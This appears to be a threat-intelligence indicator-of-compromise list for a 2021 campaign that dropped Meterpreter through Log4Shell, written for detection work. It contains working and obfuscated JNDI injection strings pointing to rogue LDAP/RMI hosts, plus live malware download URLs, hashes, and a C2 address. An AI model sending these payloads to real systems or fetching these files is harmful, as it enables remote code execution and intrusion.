forked from CronUp/Malware-IOCs
2021-12-22_MeterpreterLog4Shell
########################################################
Meterpreter via Log4Shell
########################################################
ORIGIN IPS (SCAN):
165.22.73.229
51.195.192.126
180.128.242.6
213.139.206.157
144.202.116.191
128.199.203.42
173.249.2.236
165.22.73.229
202.182.106.33
110.10.129.34
LOG4SHELL PAYLOADS:
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://144.202.34.169:1389/#Binary}
${jndi:rmi://144.202.34.169:1389/Binary}
${jndi:ldap://144.202.34.169:1389/Binary}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://144.202.34.169:1389/Binary}
${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}
ROGUE LDAP/RMI:
144.202.34.169:1389
51.79.74.227:1389
JAVA CLASS:
rmi://144.202.34.169:1389/Binary
http://144.202.34.169:8001/Binary.class
7d24fc33909e876dd6f89087e15b127c2dafaa291d06f8b5972a058ec5ecbb56 Binary.class
https://www.virustotal.com/gui/file/7d24fc33909e876dd6f89087e15b127c2dafaa291d06f8b5972a058ec5ecbb56/detection
METERPRETER:
http://cucsur.udgvirtual.udg.mx/oa/2020/SisTur/G99ZTE/m.py
http://webkaksa.com/59F1/christmas.py
https://edutra.co.in/HUS8/christmas.py
d042a0498530b38a8edbef525e009944cd28d89da61a9cfc6e21134041183e50 christmas.py
https://www.virustotal.com/gui/file/d042a0498530b38a8edbef525e009944cd28d89da61a9cfc6e21134041183e50
185.254.196.122:4445
IP 144.202.34.169 IS ALSO AN EMOTET C2:
https://feodotracker.abuse.ch/browse/host/144.202.34.169/